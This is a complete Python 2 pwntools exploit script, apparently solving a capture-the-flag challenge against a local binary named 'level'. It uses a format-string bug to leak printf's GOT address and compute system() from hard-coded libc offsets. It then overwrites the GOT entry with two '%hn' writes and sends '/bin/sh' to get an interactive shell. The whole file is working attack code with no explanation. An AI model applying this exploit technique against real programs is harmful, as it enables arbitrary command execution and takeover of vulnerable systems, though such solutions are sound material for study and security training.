#!/usr/bin/env python2

from pwn import *

target = process("./level")

got_addr_printf = 0x0804a00c

offset_printf = 0x0004bc20
offset_system = 0x0003c170

target.clean()
target.sendline(p32(got_addr_printf)+"%7$s")

printf_addr =  u32(target.readline()[4:-5])

print "[*] Located printf at: ", hex(printf_addr)

system_addr = printf_addr - offset_printf + offset_system
print "[*] Located system at: ", hex(system_addr)

young = u16(p32(system_addr)[:2]) 
old = u16(p32(system_addr)[-2:]) 

target.clean()
target.sendline(p32(got_addr_printf)+p32(got_addr_printf+2)+"%"+str(young-8)+"c%7$hn"+"%"+str(old-young)+"c%8$hn")

target.clean()
target.sendline("/bin/sh;#")
target.clean()

print "[*] Enjoy your shell"
target.interactive()
